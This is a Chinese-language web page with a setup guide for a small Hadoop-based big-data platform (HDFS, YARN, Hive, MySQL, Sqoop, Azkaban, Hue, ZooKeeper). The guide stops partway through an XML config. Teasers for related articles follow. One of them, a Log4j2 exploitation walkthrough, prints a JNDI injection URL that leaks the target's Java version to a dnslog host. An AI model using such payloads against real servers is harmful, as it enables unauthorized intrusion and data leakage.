中小型企业大数据平台全栈搭建:Hive+HDFS+YARN+Hue+ZooKeeper+MySQL+Sqoop+Azkaban 保姆级配置指南

news2025/3/19 10:32:38

目录

  • 背景‌
  • 一、环境规划与依赖准备‌
    • 1. 服务器规划(3节点集群)
    • 2. 系统与依赖‌
    • 3. Hadoop生态组件版本与下载路径
    • 4. 架构图
  • 二、Hadoop(HDFS+YARN)安装与配置‌
    • 1. 下载与解压(所有节点)
    • 2. HDFS高可用配置
    • 3. YARN资源配置‌
    • 4. 启动Hadoop集群
  • 三、MySQL安装与Hive元数据配置‌
    • 1. 安装MySQL(Master节点)
    • 2. Hive配置连接MySQL
    • 3. 初始化Hive元数据
  • 四、Sqoop安装与数据迁移实战‌
    • 1. 下载与配置(Master节点)
    • 2. 配置环境变量
  • 五、Azkaban工作流调度系统部署‌
    • 1. 安装Azkaban(Master和Worker1节点)
    • 2. 配置Azkaban‌
    • 3. 启动服务
  • 六、Hue可视化平台与ZooKeeper配置‌
    • 1. Hue安装与配置(Master节点)‌
    • 2. ZooKeeper集群配置‌
  • 六、常见问题解决方案
  • 七、总结与维护指南‌
    • 1. 核心组件配置表
    • 2. 维护建议‌
    • 3. ‌部署建议‌

背景‌

对于中小企业,构建一套完整的本地化大数据平台需兼顾成本(5w内)、易用性和扩展性。基于Hadoop生态的组件(HDFS、YARN、Hive)结合数据工具(Sqoop、Azkaban)、可视化工具(Hue)和协调服务(ZooKeeper),能够实现从数据存储、计算、调度到可视化的全链路管理。
本文基于生产环境实践,详细讲解以下组件的安装、配置与联动:

  • 存储与计算‌:HDFS、YARN、Hive
  • 数据迁移‌:Sqoop(Hive与MySQL数据互通)
  • 调度系统‌:Azkaban
  • 可视化与协调‌:Hue、ZooKeeper
  • 元数据管理‌:MySQL

(一、环境规划与依赖准备‌中)提供全组件官方下载地址‌ 和 ‌配置模板‌,助您快速搭建企业级数据平台!

一、环境规划与依赖准备‌

1. 服务器规划(3节点集群)

节点角色 IP地址 部署服务
Master‌ 192.168.1.101 NameNode、ResourceManager、Hive、Hue、ZooKeeper、Azkaban Web Server、MySQL
Worker1‌ ‌192.168.1.102 DataNode、NodeManager、ZooKeeper、Azkaban Executor
Worker2‌ ‌192.168.1.103 DataNode、NodeManager、ZooKeeper

2. 系统与依赖‌

  • 操作系统‌:CentOS 7.9(所有节点)
  • JDK‌:JDK 8u381(下载地址)
  • ‌MySQL‌:5.7.44(存储Hive元数据)
  • Python‌:3.6+(Hue依赖)

3. Hadoop生态组件版本与下载路径

组件 稳定版本 官方下载路径
HDFS 3.3.6 Apache Hadoop Releases
YARN 3.3.6 同上
Hive 3.1.3 Apache Hive Downloads
Hue 4.11.0 Gethue Releases
ZooKeeper 3.7.1 Apache ZooKeeper
MySQL 5.7.44 MySQL Community Server
Sqoop 1.4.7 Apache Sqoop
Azkaban 4.0.0 Azkaban GitHub Releases
Python 3.6+ EPEL 仓库安装 1. sudo yum install -y epel-release
2. sudo yum install -y python36 python36-devel

4. 架构图

在这里插入图片描述

二、Hadoop(HDFS+YARN)安装与配置‌

1. 下载与解压(所有节点)

wget https://dlcdn.apache.org/hadoop/common/hadoop-3.3.6/hadoop-3.3.6.tar.gz  
tar -zxvf hadoop-3.3.6.tar.gz -C /opt  
mv /opt/hadoop-3.3.6 /opt/hadoop  

2. HDFS高可用配置

1)core-site.xml‌

<configuration>  
    <property>  
        <name>fs.defaultFS</name>  
        <value>hdfs://mycluster</value>  
    </property>  
    <property>  
        <name>hadoop.tmp.dir

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2317736.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Tomcat、Open Liberty 和 WebSphere Application Server (WAS) 的配置、调试和跟踪

一、Tomcat Tomcat 是一个轻量级的开源 Java Servlet 容器。 1、配置 Tomcat 的主要配置文件位于其安装目录下的 conf 文件夹中。 server.xml: 这是 Tomcat 的核心配置文件&#xff0c;包含了服务器的基本设置&#xff0c;例如端口号、连接器配置、虚拟主机配置、以及全局的…

使用yolov8+flask实现精美登录界面+图片视频摄像头检测系统

这个是使用flask实现好看登录界面和友好的检测界面实现yolov8推理和展示&#xff0c;代码仅仅有2个html文件和一个python文件&#xff0c;真正做到了用最简洁的代码实现复杂功能。 测试通过环境&#xff1a; windows x64 anaconda3python3.8 ultralytics8.3.81 flask1.1.2…

微软OneNote无法同步解决方案

目录 前言原因UWP特性 解决方案C***h注册表 参考链接 前言 假设有多台Windows电脑&#xff0c;最方便且免费的多设备笔记同步方案就是微软自家的OneNote&#xff0c;使用OneDrive自带的5G云存储。 但是在国内大陆的OneNote&#xff0c;经常会出现无法同步、同步失败&#xff1…

Log4j2漏洞实战

1&#xff0c;打开环境后访问该ip 2&#xff0c;打开dnslog.cn&#xff0c;获取一个域名&#xff0c;我们这里是2bfvl6.dnslog.cn 3&#xff0c;访问http://47.122.51.245:8983/solr/admin/coresaction${jndi:ldap://${sys:java.version}.2bfvl6.dnslog.cn} 4&#xff0c;返回d…

【含文档+PPT+源码】基于小程序的智能停车管理系统设计与开发

项目介绍 本课程演示的是一款基于小程序的智能停车管理系统设计与开发&#xff0c;主要针对计算机相关专业的正在做毕设的学生与需要项目实战练习的 Java 学习者。 1.包含&#xff1a;项目源码、项目文档、数据库脚本、软件工具等所有资料 2.带你从零开始部署运行本套系统 3…

idea 编译打包nacos2.0.3源码,生成可执行jar 包常见问题

目录 问题1 问题2 问题3 问题4 简单记录一下nacos2.0.3&#xff0c;编译打包的步骤&#xff0c;首先下载源码&#xff0c;免积分下载&#xff1a; nacos源码&#xff1a; https://download.csdn.net/download/fyihdg/90461118 protoc 安装包 https://download.csdn.net…

YOLOv8 OBB 旋转目标检测模型详解与实践

引言 在计算机视觉领域&#xff0c;目标检测是至关重要的任务之一。YOLO&#xff08;You Only Look Once&#xff09;系列算法因其高效性和准确性而广受欢迎。YOLOv8 作为稳定版本&#xff0c;在目标检测领域取得了显著成果&#xff0c;依旧能打。本文将深入探讨 YOLOv8 OBB&a…

机器学习之支持向量机(SVM)算法详解

文章目录 引言一、 什么是支持向量机&#xff08;SVM&#xff09;二、 SVM的基本原理三、数学推导1.线性可分情况2. 非线性可分情况3. 核函数 四、SVM的优缺点优点&#xff1a;缺点&#xff1a; 五、 应用场景六、 Python实现示例七、 总结 引言 支持向量机&#xff08;Suppor…

Linux系统移植篇(十一)Linux 内核启动流程

要分析 Linux 启动流程&#xff0c;同样需要先编译一下 Linux 源码&#xff0c;因为有很多文件是需要编译才 会生成的。首先分析 Linux 内核的连接脚本文件 arch/arm/kernel/vmlinux.lds&#xff0c;通过链接脚本可以 找到 Linux 内核的第一行程序是从哪里执行的。vmlinux.lds …

功能强大的电脑硬件检测及驱动安装工具

今天给大家带来一款超实用的电脑硬件检测软件——入梦工具箱。它是开源的&#xff0c;全程无广告干扰&#xff0c;使用起来清爽又安心。 打开入梦工具箱&#xff0c;进入“硬件信息”选项&#xff0c;电脑各个配件的详细参数一目了然。 无论是CPU的型号、频率&#xff0c;还是…

【Altium Designer】设计技巧

目录 技巧一&#xff1a;铺铜连接方式 技巧二&#xff1a;铺铜连接方式 技巧一&#xff1a;铺铜连接方式 Design -> Rules -> PolygonConnect 三种选择&#xff1a; 1&#xff09;Relief Connect&#xff1a;十字连接&#xff0c;可选择是45还是90 2&#xff09;Direct…

基于FPGA的3U机箱模拟量高速采样板ADI板卡,应用于轨道交通/电力储能等

板卡简介&#xff1a; 本板为模拟量高速采样板&#xff08;ADI&#xff09;&#xff0c;主要用于电机转速和相电流检测&#xff0c;以实现电机闭环控制。 性能规格&#xff1a; 电源&#xff1a;DC5V&#xff0c;DC3.3V&#xff0c;DC15V&#xff0c;DC24V FPGA&#xff1a;…

6. 顺序表和链表*****

目录 1. 顺序表 1.1 原理 1.2 常见的增删查改 1.3 顺序表的问题 2. 链表 2.1 原理 2.2 无头单向非循环的增删查改 2.3 链表面试题 1. 删除链表中等于给定值val的所有节点203. 移除链表元素 2. 链表逆置206. 反转链表&#xff08;考的最多&#xff09; 3.给你单链表的…

【AVRCP】蓝牙协议栈深度解析:AVCTP互操作性核心机制与实现细节

目录 一、事务标签&#xff08;Transaction Label&#xff09;机制 1.1 事务标签核心规则 1.2 事务标签作用域与并发性 1.3 实现建议与陷阱规避 1.4 协议设计思考 1.5 调试与验证 二、消息分片&#xff08;Fragmentation&#xff09;机制 2.1 分片触发条件 2.2 分片支…

【MySQL】基本查询(下)

文章目录 1.筛选分页结果2.Update3.Delete4.截断表5.插入查询结果6.聚合函数6.1什么是聚合函数6.2常见的聚合函数 7.group by7.1如何显示每个部门的平均工资和最高工资7.2显示每个部门的每种岗位的平均工资和最低工资7.3显示平均工资低于2000的部门和它的平均工资 8.总结 1.筛选…

Xpath Helper 替代 - XPath 测试器

Xpath Helper 最近开始&#xff08;2025.03&#xff09;无法使用了&#xff0c;选找了几款替代品&#xff0c;XPath 测试器 是目前看来最好的。 XPath 测试器 市场地址&#xff1a; https://chromewebstore.google.com/detail/xpath-测试器/cneomjecgakdfoeehmmmoiklncdiodmh …

C++学习之云盘项目nginx

1.复习 2.知识点概述 1. 一些基本概念 1.1 Nginx 初步认识 1.2 正向 / 反向代理 1.3 域名和 IP 2. Nginx 安装和配置 2.1 安装 2.2 配置 3. Nginx 的使用 3.1 部署静态网页 3.2 反向代理和负载均衡 课外知识导读 1. URL 和 URI 2. DNS 解析过程 1. 一些基…

JAVA学习*抽象类

抽象类 在Java中&#xff0c;被abstract关键字修饰的类被称为抽象类。 特点 1、当一个类继承了抽象类&#xff0c;一定要重写抽象方法&#xff01;&#xff01;&#xff01; public abstract class Animal {public int age;public String name;//抽象方法public abstract v…

数据库管理-第303期 数据库相关硬件文章汇总(20250319)

数据库管理303期 2025-03-19 数据库管理-第303期 数据库相关硬件文章汇总&#xff08;20250319&#xff09;1 CPU & 内存2 SSD3 RDMA4 存储5 CXL6 硬件采购7 数据库一体机总结 数据库管理-第303期 数据库相关硬件文章汇总&#xff08;20250319&#xff09; 作者&#xff1…

OctoTools:一个具有复杂推理可扩展工具的智体框架

25年2月来自斯坦福大学的论文“OctoTools: An Agentic Framework with Extensible Tools for Complex Reasoning”。 解决复杂的推理任务可能涉及视觉理解、域知识检索、数值计算和多步骤推理。现有方法使用外部工具增强大语言模型 (LLM)&#xff0c;但仅限于专业领域、有限的…